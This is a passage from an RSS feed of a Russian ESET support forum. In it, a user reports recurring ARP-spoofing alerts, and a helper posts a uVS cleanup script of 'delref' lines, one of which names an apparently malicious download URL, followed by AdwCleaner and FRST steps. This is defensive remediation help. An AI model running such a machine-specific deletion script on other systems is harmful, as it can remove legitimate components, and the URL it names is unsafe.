delref P:&#92;BIN&#92;SPSYNTH.EXE
delref P:&#92;BIN&#92;SWMAN32.EXE
delref P:&#92;BIN&#92;OL.EXE
delref P:&#92;BIN&#92;SDEDIT32.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;TTLSEXT.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;SPEECH_ONECORE&#92;COMMON&#92;SPEECHRUNTIME.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;TAPILUA.DLL
delref P:&#92;BIN&#92;CADVIEWLIB&#92;CADVIEWLIB.OCX
delref P:&#92;BIN&#92;VXPLIB.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;LOCATIONFRAMEWORK.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;GOOGLE&#92;UPDATE&#92;1.3.35.442&#92;PSMACHINE.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;PERCEPTIONSIMULATIONEXTENSIONS.DLL
delref P:&#92;BIN&#92;ELMODUS.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;GOOGLE&#92;UPDATE&#92;1.3.36.32&#92;PSMACHINE.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;COMPPKGSRV.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;EAPPCFGUI.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;LISTSVC.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;AUTHHOSTPROXY.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;WBEM&#92;NLMCIM.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;RMSROAMINGSECURITY.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;SYSTEMSETTINGSBROKER.EXE
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;GOOGLE&#92;UPDATE&#92;1.3.35.452&#92;PSMACHINE.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;SPEECH_ONECORE&#92;COMMON&#92;SAPI_EXTENSIONS.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;GPSVC.DLL
delref P:&#92;BIN&#92;ABONENTS.DLL
delref P:&#92;BIN&#92;PHOENIXSRV.EXE
delref %SystemRoot%&#92;SYSWOW64&#92;IDLISTEN.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;WIFICONFIGSP.DLL
delref %SystemDrive%&#92;PROGRAM FILES&#92;COMMON FILES&#92;SYSTEM&#92;OLE DB&#92;MSDAORA.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;WIREDNETWORKCSP.DLL
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&#38;PRODVERSION=38.0&#38;X=ID%3DMJBEPBHONBOJPOAENHCKJOCCHGFIAOFO%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://BESTBLUES.TECH/APP/APP.EXE
apply



</pre>
=============
<br /><br /><br />2) Выполните лог в AdwCleaner<br /><noindex><a href="http://forum.esetnod32.ru/forum9/topic7084/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic7084/</a></noindex><br /><br />после завершения сканирования:<br />Записи относящиеся к Mail.Ru и Yandex можете не удалять ( если пользуетесь программой )<br />На вкладке:<br />Папки (Folders) для Mail.Ru &nbsp;и Yandex снимите [V]<br /><br /><br />Удалите найденное в AdwCleaner по кнопке Очистить (Clean), подтвердите действие<br />с автоперезагрузкой<br /><br />3) Далее выполните FRST: <noindex><a href="http://forum.esetnod32.ru/forum9/topic2798/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic2798/</a></noindex> <br />
			<i>29.01.2021 22:55:01, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum3/topic16303/message111767/</link>
			<guid>http://forum.esetnod32.ru/messages/forum3/topic16303/message111767/</guid>
			<pubDate>Fri, 29 Jan 2021 22:55:01 +0300</pubDate>
			<category>Обращение в техническую поддержку</category>
		</item>
		<item>
			<title>Обнаружена атака путем подделки записей кэша ARP</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum3/topic16303/message111764/">Обнаружена атака путем подделки записей кэша ARP</a></b> <i>Каждый день выходит это сообщение</i> в форуме <a href="http://forum.esetnod32.ru/forum3/">Обращение в техническую поддержку</a>. <br />
			создал образ автозапуска в uVS. прикрепил здесь. Помогите решить проблему <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118576">COMPUTER_2021-01-29_22-08-26_v4.1.3.rar</a><br /><i>29.01.2021 21:24:16, Ramzi Sadigli.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum3/topic16303/message111764/</link>
			<guid>http://forum.esetnod32.ru/messages/forum3/topic16303/message111764/</guid>
			<pubDate>Fri, 29 Jan 2021 21:24:16 +0300</pubDate>
			<category>Обращение в техническую поддержку</category>
		</item>
	</channel>
</rss>
